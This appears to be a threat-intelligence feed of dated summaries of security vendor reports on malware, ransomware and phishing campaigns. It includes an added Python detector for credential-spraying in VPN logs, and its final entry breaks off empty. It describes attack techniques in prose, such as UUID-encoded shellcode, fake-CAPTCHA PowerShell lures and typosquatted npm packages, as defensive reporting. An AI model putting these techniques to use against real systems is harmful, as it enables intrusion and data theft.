ASEC researchers have discovered a post recruiting students for a course that contained a link to download a malicious HWP document. The HWP file, disguised as an application form, contained both a legitimate document and a malicious BAT file. When opened, the BAT file creates and executes additional files, including an executable named 0304.exe that downloads further malware. The malware connects to an external URL to retrieve and execute additional commands, making it difficult for users to detect.
Source: https://asec.ahnlab.com/en/86841/
2025-03-24
Lazarus_Group_Hits_NPM_with_Malicious_Packages
MEDIUM
+
Intel Source:
Socket
Intel Name:
Lazarus_Group_Hits_NPM_with_Malicious_Packages
Date of Scan:
2025-03-24
Impact:
MEDIUM
Summary:
Researchers from Socket have uncovered six new malicious npm packages linked to North Korea's Lazarus Group. These packages are designed to steal credentials, extract cryptocurrency data and deploy backdoors, and have been downloaded over 330 times. The packages used typosquatting, mimicking trusted libraries, and were also hosted on GitHub to appear legitimate, increasing the risk of their integration into developer workflows.
Source: https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages
2025-03-23
Albabat_Ransomware_Expands_to_Multiple_OS
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Albabat_Ransomware_Expands_to_Multiple_OS
Date of Scan:
2025-03-23
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have identified new versions of the Albabat ransomware, now targeting Windows, Linux and macOS devices. The ransomware uses GitHub's REST API to streamline operations, retrieving configuration data with the "Awesome App" User-Agent. Albabat version 2.0 encrypts various file types while skipping specific folders and files, and terminates multiple processes belonging to common applications. The ransomware tracks infections and payments through a database, supporting ransom demands and data sales. Binaries for Linux and macOS are included in these newer versions.
Source: https://www.trendmicro.com/en_us/research/25/c/albabat-ransomware-group.html
2025-03-23
Head_Mare_and_Twelve_Target_Russia_Together
LOW
+
Intel Source:
Securelist
Intel Name:
Head_Mare_and_Twelve_Target_Russia_Together
Date of Scan:
2025-03-23
Impact:
LOW
Summary:
Researchers at Securelist have discovered a coordinated cyberattack against Russian firms, which they link to the hacktivist groups Twelve and Head Mare. According to the investigation, Head Mare used command-and-control infrastructure and tools previously associated with Twelve, suggesting the two may have worked together. The attackers used both new and old tools, including a modified PhantomJitter backdoor, the CobInt backdoor (previously seen only with Twelve) and PowerShell-based malware.
Source: https://securelist.com/head-mare-twelve-collaboration/115887/
2025-03-23
Dragon_RaaS_Emerging_Ransomware_Threat
LOW
+
Intel Source:
Sentinelone
Intel Name:
Dragon_RaaS_Emerging_Ransomware_Threat
Date of Scan:
2025-03-23
Impact:
LOW
Summary:
Researchers from SentinelOne have found that Dragon RaaS is a pro-Russian ransomware gang formed as an offshoot of the Stormous group, which is tied to the larger cybercrime syndicate known as "The Five Families". While Dragon RaaS presents itself as a sophisticated Ransomware-as-a-Service (RaaS) operation, its activity is primarily opportunistic, involving website defacements and smaller-scale ransomware incidents. The gang primarily targets organizations in the United States, the United Kingdom, Israel, France and Germany, gaining access through misconfigurations, brute-force attacks and stolen credentials.
Source: https://www.sentinelone.com/blog/dragon-raas-pro-russian-hacktivist-group-aims-to-build-on-the-five-families-cybercrime-reputation/
2025-03-23
Python_Bot_via_DLL_Side_Loading_Attack
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_Bot_via_DLL_Side_Loading_Attack
Date of Scan:
2025-03-23
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified Python-based malware distributed via DLL side-loading. The attack starts with a ZIP archive named "Hootsuite (1).zip" that contains hidden files. When opened, the victim sees a benign-looking program called Hootsuite.exe, which is actually an old version of the Haihaisoft PDF reader that is susceptible to DLL side-loading.
Source: https://isc.sans.edu/diary/rss/31778
2025-03-23
Unique_Malware_Samples_Identified
LOW
+
Intel Source:
Palo Alto
Intel Name:
Unique_Malware_Samples_Identified
Date of Scan:
2025-03-23
Impact:
LOW
Summary:
Researchers from Palo Alto Networks have discovered three unique malware strains with unusual characteristics. The first is a passive IIS backdoor developed in C++/CLI, a language rarely utilized in malware. The second is a bootkit that uses an unprotected kernel driver to install the GRUB 2 bootloader in an unexpected way. The third is a Windows implementation of a cross-platform post-exploitation framework in C++ that differs significantly from the frameworks seen last year. These findings underscore threat actors' shifting approaches, which include both custom-built and unusual malware tools.
Source: https://unit42.paloaltonetworks.com/unusual-malware/
2025-03-22
Clickbait_to_Catastrophe
LOW
+
Intel Source:
Cofense
Intel Name:
Clickbait_to_Catastrophe
Date of Scan:
2025-03-22
Impact:
LOW
Summary:
Cofense researchers have discovered a phishing campaign targeting Meta Business account holders through fake Instagram alerts claiming that the user has violated advertising policies and that their ads have been suspended. The email includes a "Check more Details" button that redirects to a fake Meta support page. There, a "Request review" prompt asks the user to enter their name and business email, leading them to a fake chatbot. If the chatbot process fails, the attackers trick users into following fake "System check" instructions to fix their account, which give the attackers access by registering their own authentication app. The attackers' main goal is to hijack the account and steal sensitive information.
Source: https://cofense.com/blog/clickbait-to-catastrophe-how-a-fake-meta-email-leads-to-password-plunder
2025-03-22
CVE_2024_4577_Exploited_in_Mass_Attacks
LOW
+
Intel Source:
BitDefender
Intel Name:
CVE_2024_4577_Exploited_in_Mass_Attacks
Date of Scan:
2025-03-22
Impact:
LOW
Summary:
Researchers at Bitdefender have tracked a new campaign where threat actors are exploiting CVE-2024-4577, a vulnerability first identified in June 2024. This critical security flaw in PHP, affecting Windows systems in CGI mode, enables remote attackers to execute arbitrary code by manipulating character encoding conversions.
Source: https://www.bitdefender.com/en-us/blog/businessinsights/technical-advisory-update-mass-exploitation-cve-2024-4577
2025-03-22
DocSwap_A_Deceptive_Cyber_Threat
LOW
+
Intel Source:
Medium(S2W Threat Research)
Intel Name:
DocSwap_A_Deceptive_Cyber_Threat
Date of Scan:
2025-03-22
Impact:
LOW
Summary:
Researchers at S2W Threat Research have uncovered DocSwap, a new malware masquerading as a Document Viewing Authentication App, which is most likely tied to a North Korean-backed APT group. This malware, which was first signed on December 13, 2024, decrypts an internal file, dynamically loads a DEX file, and uses a C2 server to undertake malicious actions such as keylogging and information stealing.
Source: https://medium.com/s2wblog/detailed-analysis-of-docswap-malware-disguised-as-security-document-viewer-218a728c36ff
2025-03-22
Downloader_Malware_Created_with_JPHP_Interpreter
LOW
+
Intel Source:
ASEC
Intel Name:
Downloader_Malware_Created_with_JPHP_Interpreter
Date of Scan:
2025-03-22
Impact:
LOW
Summary:
ASEC researchers have discovered malware built with JPHP, a PHP interpreter that runs on the Java Virtual Machine. The malware is distributed as a ZIP file containing a Java Runtime Environment and various libraries, which allow it to run on the victim's machine even if Java is not installed. When executed, it starts a Java process that loads a malicious JPHP file to download and install other malware such as STRRAT and DanaBot.
Source: https://asec.ahnlab.com/ko/86829/
2025-03-22
VanHelsing_Ransomware
HIGH
+
Intel Source:
TheRavenFile
Intel Name:
VanHelsing_Ransomware
Date of Scan:
2025-03-22
Impact:
HIGH
Summary:
VanHelsing Ransomware emerged on March 18, 2025, targeting Windows systems primarily in the US and France. It encrypts files with .vanhelsing and .vanlocker extensions using a combination of Curve25519, AES, and Salsa20/ChaCha encryption algorithms, with XOR encoding for obfuscation. The ransomware drops a malicious executable named locker.exe and creates a mutex (Global\VanHelsing) to ensure only one instance runs at a time. It demands a ransom of $40,000 in Bitcoin and communicates with its infrastructure via Onion links for data leakage and ransom negotiation. The ransomware leverages nginx servers hosted by Xhost Internet Solutions.
Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/VanHelsing%20Ransomware
2025-03-21
Rust_Beacon_Delivers_Cobalt_Strike_to_South_Korea
LOW
+
Intel Source:
Hunt.IO
Intel Name:
Rust_Beacon_Delivers_Cobalt_Strike_to_South_Korea
Date of Scan:
2025-03-21
Impact:
LOW
Summary:
Researchers at Hunt.IO have discovered a publicly exposed web server containing tools linked to an intrusion campaign targeting South Korean organizations. The server, active for less than 24 hours, hosted a Rust-compiled Windows executable delivering a modified version of Cobalt Strike, along with other tools like SQLMap, Web-SurvivalScan, and dirsearch. These tools suggest the actor exploited vulnerable web applications. Metadata indicates some attacks were successful, with government and commercial entities as the primary targets. The combination of a Rust-compiled loader and modified Cobalt Strike highlights the actor's approach to malware delivery and post-exploitation.
Source: https://hunt.io/blog/rust-beacon-cobalt-strike-cat-south-korea#Cobalt_Strike_Cat_Open_Directory_Host_Observables_and_IOCs
2025-03-21
Safe_Wallet_Confirms_North_Korea_Crypto_Hack
LOW
+
Intel Source:
Safe{Wallet}
Intel Name:
Safe_Wallet_Confirms_North_Korea_Crypto_Hack
Date of Scan:
2025-03-21
Impact:
LOW
Summary:
Safe{Wallet} has confirmed that the $1.5 billion Bybit crypto heist was a highly sophisticated, state-sponsored attack carried out by North Korean hacking group TraderTraitor (Jade Sleet, PUKCHONG, UNC4899). The hackers compromised a Safe{Wallet} developer's macOS laptop by tricking them into downloading a malicious Docker project via social engineering. They then hijacked AWS session tokens, bypassing MFA security controls. The attack, which began on February 4, 2025, involved advanced tactics to erase traces, hindering investigation efforts.
Source: https://x.com/safe/status/1897663514975649938?s=09
2025-03-21
New_Ransomware_Operator_Exploits_Fortinet_Vulnerability_Duo
MEDIUM
+
Intel Source:
Forescout
Intel Name:
New_Ransomware_Operator_Exploits_Fortinet_Vulnerability_Duo
Date of Scan:
2025-03-21
Impact:
MEDIUM
Summary:
Forescout researchers have identified a series of intrusions exploiting two Fortinet vulnerabilities, starting with the compromise of Fortigate firewall appliances and culminating in the deployment of a new ransomware strain called SuperBlack. The intrusions are attributed to the threat actor "Mora_001," named after Slavic mythology, due to its use of Russian artifacts. This actor combines opportunistic attacks with connections to the LockBit ransomware ecosystem, highlighting the growing complexity of modern ransomware operations, where specialized teams collaborate to enhance their capabilities.
Source: https://www.forescout.com/blog/new-ransomware-operator-exploits-fortinet-vulnerability-duo/
2025-03-21
MirrorFace_Targets_Europe_with_ANEL_Backdoor
MEDIUM
+
Intel Source:
Welivesecurity
Intel Name:
MirrorFace_Targets_Europe_with_ANEL_Backdoor
Date of Scan:
2025-03-21
Impact:
MEDIUM
Summary:
ESET researchers have discovered that the MirrorFace cyber espionage group expanded its operations to target a Central European diplomatic institute, marking their first attack on a European entity. The group is using the ANEL backdoor, previously linked to APT10, and deploying a customized version of AsyncRAT with a complex execution chain inside Windows Sandbox. The investigation also revealed updates in MirrorFace’s tactics, techniques, and tools (TTPs).
Source: https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/
2025-03-20
Squid_Werewolf_Poses_as_Job_Recruiters
LOW
+
Intel Source:
BI.ZONE
Intel Name:
Squid_Werewolf_Poses_as_Job_Recruiters
Date of Scan:
2025-03-20
Impact:
LOW
Summary:
BI.ZONE researchers have identified a phishing campaign by the Squid Werewolf (APT37) group, targeting victims with fake job offers from an industrial organization. The attack involves a password-protected ZIP file containing a malicious LNK file. When opened, the LNK file executes a sequence of commands that decode Base64 data and copy an executable (dfsvc.exe) to the startup folder for persistence. Additional malicious files, including a DLL and a PDF, are dropped to carry out further malicious actions.
Source: https://bi.zone/eng/expertise/blog/sotni-tysyach-rubley-za-vashi-sekrety-kibershpiony-squid-werewolf-maskiruyutsya-pod-rekruterov/?utm_source=main&utm_medium=link&utm_campaign=sotni-tysyach-rubley-za-vashi-sekrety-kibershpiony-squid-werewolf-maskiruyutsya-pod-rekruterov
2025-03-20
Phishing_Campaign_Targeting_UniPd
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Phishing_Campaign_Targeting_UniPd
Date of Scan:
2025-03-20
Impact:
LOW
Summary:
Researchers from CERT-AGID have identified a phishing campaign targeting the University of Padua in which attackers are stealing credentials from students and employees of the university. The attackers created two fake websites impersonating the university to trick users into entering their credentials.
Source: https://cert-agid.gov.it/news/campagna-di-phishing-mirata-a-unipd-circa-200-credenziali-compromesse/
2025-03-19
Online_File_Converters_Installs_Malware
LOW
+
Intel Source:
MalwareBytes
Intel Name:
Online_File_Converters_Installs_Malware
Date of Scan:
2025-03-19
Impact:
LOW
Summary:
Malwarebytes researchers have observed cybercriminals creating fake online file conversion websites that offer free services but actually deliver malware. These sites typically offer to convert [.]doc to [.]pdf or merge multiple images into a single [.]pdf. Once a user is compromised, the malware steals sensitive information such as Social Security numbers, banking credentials, cryptocurrency wallets, email addresses and login passwords. It can also capture session tokens that allow the criminals to bypass multi-factor authentication.
Source: https://www.malwarebytes.com/blog/news/2025/03/warning-over-free-online-file-converters-that-actually-install-malware
2025-03-19
Phishing_campaign_impersonates_Booking_dot_com
LOW
+
Intel Source:
Microsoft
Intel Name:
Phishing_campaign_impersonates_Booking_dot_com
Date of Scan:
2025-03-19
Impact:
LOW
Summary:
Researchers from Microsoft Threat Intelligence have discovered an ongoing phishing campaign, active since December 2024, that impersonates Booking.com and targets hospitality firms in numerous regions. The campaign uses the ClickFix social engineering technique, which tricks users into running commands that download credential-stealing malware, enabling financial theft. Attackers exploit users' instinct to fix problems by displaying bogus error messages that entice them to open the Windows Run dialog and execute a malicious command.
Source: https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
2025-03-19
StilachiRAT_Analysis
LOW
+
Intel Source:
Microsoft
Intel Name:
StilachiRAT_Analysis
Date of Scan:
2025-03-19
Impact:
LOW
Summary:
Microsoft researchers have identified a new RAT called StilachiRAT, designed to steal sensitive data, evade detection and maintain persistence on compromised systems. It gathers detailed system information, including OS details, hardware identifiers and active applications, and uses multiple techniques to remain hidden while collecting data from the target. StilachiRAT connects to C2 servers that allow attackers to remotely execute commands, use the infected system as a proxy and manipulate registry settings. It also continuously monitors the clipboard for sensitive information such as passwords and cryptocurrency wallet addresses.
Source: https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/
2025-03-19
SocGholish_Distribution_of_RansomHub_Ransomware
LOW
+
Intel Source:
Trend Micro
Intel Name:
SocGholish_Distribution_of_RansomHub_Ransomware
Date of Scan:
2025-03-19
Impact:
LOW
Summary:
Researchers at Trend Micro have observed the complex intrusion set Water Scylla, which spans multiple stages: compromised websites, collaboration with other threat actors via rogue Keitaro TDS instances, SocGholish payload delivery, and post-compromise activity that leads to RansomHub ransomware. SocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader and evasion techniques to avoid standard detection. It spreads through compromised legitimate websites that redirect visitors to fake browser-update notices carrying malicious payloads.
Source: https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html
2025-03-18
Fake_Captcha_Malware_Campaign
LOW
+
Intel Source:
Trustwave
Intel Name:
Fake_Captcha_Malware_Campaign
Date of Scan:
2025-03-18
Impact:
LOW
Summary:
Trustwave researchers have discovered a campaign using fake CAPTCHA verifications to trick victims into running PowerShell scripts that deliver malware such as Lumma and Vidar. The attack begins when a user visits a malicious website and is shown a CAPTCHA for verification. Instead of verifying the user, it prompts them to execute a PowerShell command. That command uses the mshta tool to download and execute a file served with an .mp4 extension, which launches a further PowerShell script that installs infostealers such as Lumma and Vidar, silently stealing personal data, login credentials and financial information.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/resurgence-of-a-fake-captcha-malware-campaign/
2025-03-18
Black_Basta_Raas_Members_Target_Edge_Network_Devices
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
Black_Basta_Raas_Members_Target_Edge_Network_Devices
Date of Scan:
2025-03-18
Impact:
MEDIUM
Summary:
EclecticIQ researchers have analyzed internal chat logs leaked via the @ExploitWhispers Telegram channel by a Russian-speaking actor linked to the Black Basta RaaS group. The logs, covering communications from September 2023 to September 2024, reveal details of the group's operations, including the use of a brute-forcing framework called BRUTED. This tool automates internet scanning and credential-stuffing attacks against network edge devices such as firewalls and VPN solutions. The leaked chats also expose internal conflicts, key member roles and infrastructure details. The group primarily targets the Business Services, Industrial Machinery and Manufacturing sectors.
Source: https://blog.eclecticiq.com/inside-bruted-black-basta-raas-members-used-automated-brute-forcing-framework-to-target-edge-network-devices
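A brute-forcing framework aimed at VPN and firewall logins leaves one shape in the authentication logs: a single source producing many failures across many distinct usernames in a short window. The block below is an added Python detection example, not EclecticIQ's code and not derived from BRUTED itself; the log line format, the thresholds (20 failures against at least 10 accounts inside five minutes) and the sample lines are all constructed for this example and would be tuned to a real appliance's syslog.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Generic VPN/firewall auth line; this field layout is an assumption for the example.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)Z \S+ vpn-auth: "
    r"user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>OK|FAIL)$"
)


def build_sample_log() -> list:
    """Constructed sample log (not BRUTED output): one spraying source, one clumsy user, one noise line."""
    base = datetime(2025, 3, 18, 9, 0, 0)
    lines = []
    for i in range(30):  # one source, 30 distinct usernames, four seconds apart
        t = base + timedelta(seconds=4 * i)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%S}Z fw1 vpn-auth: user=user{i:02d} src=203.0.113.5 result=FAIL")
    for i, r in enumerate(("FAIL", "FAIL", "OK")):  # a legitimate user mistyping twice
        t = base + timedelta(seconds=60 + 20 * i)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%S}Z fw1 vpn-auth: user=alice src=198.51.100.7 result={r}")
    lines.append("2025-03-18T09:05:00Z fw1 kernel: link up")  # unrelated line the parser skips
    return lines


def parse_events(lines):
    """Yield (timestamp, source, user, result) for every line matching the auth format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"), m["src"], m["user"], m["result"]


def detect_spray(lines, window=timedelta(minutes=5), min_failures=20, min_users=10) -> dict:
    """Flag sources with many failures against many distinct accounts inside a sliding window.

    Thresholds are assumptions to tune per environment; the shape (one source, many users)
    is what separates credential stuffing from one user fat-fingering a password.
    """
    fails = defaultdict(list)
    for ts, src, user, result in parse_events(lines):
        if result == "FAIL":
            fails[src].append((ts, user))
    alerts = {}
    for src, events in fails.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward until it spans at most `window`
            span = events[start:end + 1]
            users = {u for _, u in span}
            if len(span) >= min_failures and len(users) >= min_users:
                best = alerts.get(src)
                if best is None or len(span) > best["failures"]:
                    alerts[src] = {"failures": len(span), "distinct_users": len(users),
                                   "first": span[0][0], "last": span[-1][0]}
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(build_sample_log()).items():
        print(src, info)
```

Keying on distinct usernames per source is what keeps a forgetful employee out of the alert; a framework that rotates source addresses per attempt would need the same logic applied per target account or per ASN instead.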
2025-03-18
Exposing_the_GrassCall_Campaign
LOW
+
Intel Source:
SEQRITE
Intel Name:
Exposing_the_GrassCall_Campaign
Date of Scan:
2025-03-18
Impact:
LOW
Summary:
The GrassCall malware campaign, led by the Russian-speaking cybercriminal group Crazy Evil and its subgroup kevland, targets job seekers in the cryptocurrency and Web3 sectors. Using fake job interviews, the attackers deploy malware to compromise victims' systems and steal their digital assets. Since 2021, Crazy Evil has become a major threat, specializing in identity fraud, cryptocurrency theft and sophisticated social engineering. Their operations rely on "traffers", specialists who steer online traffic to lure victims into phishing scams, leading to significant financial losses.
Source: https://www.seqrite.com/blog/unmasking-grasscall-campaign-the-apt-behind-job-recruitment-cyber-scams/
2025-03-18
Exploring_Strela_Stealer_Attacks_in_Europe
LOW
+
Intel Source:
Trustwave
Intel Name:
Exploring_Strela_Stealer_Attacks_in_Europe
Date of Scan:
2025-03-18
Impact:
LOW
Summary:
Strela Stealer is an infostealer malware that has been active since late 2022, primarily targeting Mozilla Thunderbird and Microsoft Outlook users in selected European countries. Operated by the threat actor ‘Hive0145’, it is distributed via large-scale phishing campaigns, often replacing legitimate invoice attachments with a ZIP archive containing the malware loader. Strela Stealer’s infrastructure is linked to Russian bulletproof hosting providers. Over time, the malware has evolved with advanced obfuscation techniques and a specialized crypter, ‘Stellar loader’, to evade detection. A recent phishing campaign at the start of this year targeted German-speaking users, showcasing the malware’s continued development.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-deep-dive-into-strela-stealer-and-how-it-targets-european-countries/
2025-03-17
A_New_Variant_of_XCSSET_Malware
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
A_New_Variant_of_XCSSET_Malware
Date of Scan:
2025-03-17
Impact:
MEDIUM
Summary:
Researchers at Microsoft have discovered a new version of the XCSSET malware that infects Xcode projects on macOS. The malware is capable of stealing sensitive data such as system details, user files, digital wallet data and personal notes. This variant adds stronger obfuscation, updated persistence methods and new infection techniques. It spreads by embedding itself into Xcode projects that are commonly shared among developers, and it has an active command-and-control (C2) server from which it downloads further malicious modules.
Source: https://www.microsoft.com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/
2025-03-16
New_DGA_Variant_Uses_Typo_Evasion_Tactics
LOW
+
Intel Source:
Palo Alto
Intel Name:
New_DGA_Variant_Uses_Typo_Evasion_Tactics
Date of Scan:
2025-03-16
Impact:
LOW
Summary:
Researchers at Palo Alto have discovered a new cyberattack campaign, utilizing over 6,000 newly registered domains (NRDs) that employ a novel domain generation algorithm (DGA) variant. The DGAs are dictionary-based, creating domain names that resemble legitimate ones to evade detection. These NRDs redirected users to ads for potentially unwanted Android apps, with 96% of associated files being malicious. Further investigation revealed a broader scope, with 444,898 NRDs tied to the same actor, redirecting to 178 domains exhibiting a new "typo DGA" pattern. This pattern involves dictionary words with typographical errors, enhancing evasion tactics. The discovery was made through a novel graph-intelligence pipeline that correlates domain registrations, hosting infrastructure, and passive DNS and WHOIS data.
Source: https://unit42.paloaltonetworks.com/typo-domain-generation-algorithms/
2025-03-16
An_Investigation_of_Medusa_Ransomware
MEDIUM
+
Intel Source:
CISA
Intel Name:
An_Investigation_of_Medusa_Ransomware
Date of Scan:
2025-03-16
Impact:
MEDIUM
Summary:
The FBI, CISA, and MS-ISAC have issued a joint advisory detailing known tactics, techniques, and procedures (TTPs) related to Medusa ransomware. First identified in June 2021, Medusa is a ransomware-as-a-service (RaaS) that has impacted over 300 victims across various critical sectors, including healthcare, education, legal, insurance, technology, and manufacturing, as of February 2025.
Source: https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf
2025-03-16
Analyzing_OBSCUREBAT
HIGH
+
Intel Source:
SecuronixThreatLabs
Intel Name:
Analyzing_OBSCUREBAT
Date of Scan:
2025-03-16
Impact:
HIGH
Summary:
Securonix Threat Research has identified a stealthy malware campaign, tracked as OBSCURE#BAT, that uses social engineering and deceptive file downloads to compromise systems. The attack begins with heavily obfuscated batch scripts that deploy a user-mode rootkit, identified as r77, capable of hiding files, processes, and registry entries. The malware establishes persistence through scheduled tasks and registry-injected PowerShell scripts, making it difficult to detect using standard tools. The r77 rootkit can mask any file, registry key, or task beginning with a specific prefix. The attackers' methods include fake CAPTCHA prompts and masquerading as legitimate software. The malware's ability to hide its artifacts and manipulate system processes represents a significant threat, as it can evade detection and maintain a persistent presence. Securonix's analysis indicates the malware monitors user interactions, including clipboard activity, and saves this data into hidden files. The ultimate goal appears to be data exfiltration and system control, potentially leveraging the QuasarRAT, as indicated by observed network connections. The implications are severe, as compromised systems could be used for espionage, data theft, or further attacks.
Source: https://www.securonix.com/blog/analyzing-obscurebat-threat-actors-lure-victims-into-executing-malicious-batch-scripts-to-deploy-stealthy-rootkits/
2025-03-16
UNC3886_Targets_Juniper_Routers
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC3886_Targets_Juniper_Routers
Date of Scan:
2025-03-16
Impact:
MEDIUM
Summary:
Google/Mandiant researchers have uncovered a cyber espionage campaign conducted by UNC3886, a China-nexus threat group known for targeting network and virtualization technologies. The group primarily targets defense, technology and telecommunications organizations in the US and Asia. In this campaign, the attackers deployed custom backdoors based on the TINYSHELL malware on Juniper Networks Junos OS routers, giving them covert access to and control of the compromised devices. The malware also includes a script that disables logging to cover its tracks.
Source: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/
2025-03-15
Activities_of_REMCOS_RAT
LOW
+
Intel Source:
Palo Alto
Intel Name:
Activities_of_REMCOS_RAT
Date of Scan:
2025-03-15
Impact:
LOW
Summary:
Palo Alto researchers have identified that the REMCOS RAT continues to spread via email, with cybercriminals using tactics to bypass spam filters. One such method involves disguising a ZIP archive with a .7z extension. Even without 7-Zip installed on a Windows 11 system, File Explorer extracted the malware from the archive, highlighting how extension-based filtering can be defeated when the receiving tool identifies a file by its contents.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-10-IOCs-for-Remcos-RAT-activity.txt
2025-03-15
Stealthy_Shellcode_Encoding_with_UUIDs
LOW
Intel Source:
ISC.SANS
Intel Name:
Stealthy_Shellcode_Encoding_with_UUIDs
Date of Scan:
2025-03-15
Impact:
LOW
Summary:
Researchers at ISC.SANS have discussed a stealthy malware technique where the shellcode is encoded into UUIDs (Universally Unique Identifiers) to evade detection. By using the Windows API function `UuidFromStringA()`, malware authors can convert UUID strings into raw shellcode, which is then injected into memory for execution. This method hides the shellcode in plain sight, making it difficult for detection tools to flag it, as the payload appears legitimate. The technique has been linked to groups like Lazarus and is part of a broader effort to bypass traditional security measures.
Source: https://isc.sans.edu/diary/Shellcode+Encoded+in+UUIDs/31752/
2025-03-14
APT28_HTA_Trojan
MEDIUM
Intel Source:
malwr-analysis
Intel Name:
APT28_HTA_Trojan
Date of Scan:
2025-03-14
Impact:
MEDIUM
Summary:
Researchers from Malware Analysis have discovered a new malware called HTA trojan, which is being used by APT 28 to target diplomatic organisations in Central Asia and Kazakhstan. APT 28 uses a unique encoding method called VBScript Encoded to hide the malicious script and adds extra layers of obfuscation to make detection more difficult. They also insert special character sequences such as @#@ into their code. Additionally, the malware takes advantage of a built-in Windows component, vbscript.dll, to decode the hidden commands.
Source: https://malwareanalysisspace.blogspot.com/2025/03/deobfuscating-apt28s-hta-trojan-deep.html
2025-03-14
LithiumWare_Ransomware
MEDIUM
Intel Source:
Cyfirma
Intel Name:
LithiumWare_Ransomware
Date of Scan:
2025-03-14
Impact:
MEDIUM
Summary:
Cyfirma researchers have uncovered a new ransomware strain called LithiumWare (LithiumWareV2.exe). It first appeared in December 2024 and performs various malicious activities including encrypting files, modifying system settings, establishing persistence and evading detection. The ransomware uses AES and RSA encryption to lock files. It also monitors the clipboard to steal cryptocurrency transactions by replacing wallet addresses with attacker’s wallet addresses. Additionally, it modifies the Windows registry, creates startup entries and copies itself to hidden system directories. Once files are encrypted, the ransomware drops a ransom note demanding a payment of $900,000 in exchange for the decryption key.
Source: https://www.cyfirma.com/research/lithiumware-ransomware/
2025-03-14
YouTubers_Distributing_SilentCryptoMiner
LOW
Intel Source:
Securelist
Intel Name:
YouTubers_Distributing_SilentCryptoMiner
Date of Scan:
2025-03-14
Impact:
LOW
Summary:
Researchers at Securelist have uncovered a large-scale malware campaign in which cybercriminals are distributing a cryptocurrency miner disguised as a tool for bypassing internet restrictions based on deep packet inspection (DPI). This malware campaign has infected more than 2,000 users in Russia. The attack began when a YouTuber posted a tutorial video on bypassing restrictions. The video contained links to a malicious archive hosted on the website gitrok[.]com. By the time the malicious link was removed from the description, with a note stating that the program no longer worked, the site had already recorded over 40,000 downloads.
Source: https://securelist.com/silentcryptominer-spreads-through-blackmail-on-youtube/115788/
2025-03-14
Phantom_Goblin_Malware
LOW
Intel Source:
Cyble
Intel Name:
Phantom_Goblin_Malware
Date of Scan:
2025-03-14
Impact:
LOW
Summary:
Cyble researchers have uncovered a new malware strain called Phantom Goblin, which is being distributed through RAR attachments in phishing emails. The attackers use social engineering tactics to trick users into opening a malicious LNK file disguised as a legitimate PDF document. The LNK file is hidden inside the RAR archive, which appears to be a normal document file. When the user clicks on the LNK file, it executes a PowerShell command that downloads additional malware from a GitHub repository, allowing attackers to carry out further malicious activities. The primary goal of this malware is to steal sensitive data from the victim’s system. It forcefully terminates browser processes to extract cookies, login credentials and browsing history, and exfiltrates the stolen data through a Telegram bot.
Source: https://cyble.com/blog/phantom-goblin-covert-credential-theft/
2025-03-13
Boramae_Ransomware
MEDIUM
Intel Source:
Cyfirma
Intel Name:
Boramae_Ransomware
Date of Scan:
2025-03-13
Impact:
MEDIUM
Summary:
Cyfirma researchers have identified a new ransomware strain called Boramae, which specifically targets Windows systems and appends the .boramae extension to encrypted files. The ransomware encrypts user files, leaves a ransom note, README.txt, with instructions for victims to recover their files, and changes the desktop wallpaper to pressure victims into paying within 20 minutes. The operators threaten to leak sensitive data such as financial records and employee data if the ransom is not paid. They offer a 50% discount if the ransom is paid within 12 hours but warn that attempting to decrypt files without their help could permanently corrupt them.
Source: https://www.cyfirma.com/research/boramae-ransomware/
2025-03-13
Winos_40_Target_Users_in_Taiwan
LOW
Intel Source:
Fortinet
Intel Name:
Winos_40_Target_Users_in_Taiwan
Date of Scan:
2025-03-13
Impact:
LOW
Summary:
Fortinet researchers have identified a campaign targeting organizations in Taiwan that leverages an advanced malware framework called Winos4.0. Initially it was distributed through gaming apps, but attackers are now using phishing emails to spread it. The email masquerades as a message from Taiwan’s National Taxation Bureau, claims to contain a list of enterprises scheduled for tax inspection, and asks the recipient to forward the information to their company’s treasurer. However, the attachment is actually a ZIP file containing malicious files, including ApowerREC.exe. When the fake ApowerREC.exe runs, it secretly activates the malware, allowing the attacker to take control of the machine and steal data.
Source: https://www.fortinet.com/blog/threat-research/winos-spreads-via-impersonation-of-official-email-to-target-users-in-taiwan
2025-03-13
Lazarus_Group_Relies_on_Astrill_VPN
MEDIUM
Intel Source:
Silent Push
Intel Name:
Lazarus_Group_Relies_on_Astrill_VPN
Date of Scan:
2025-03-13
Impact:
MEDIUM
Summary:
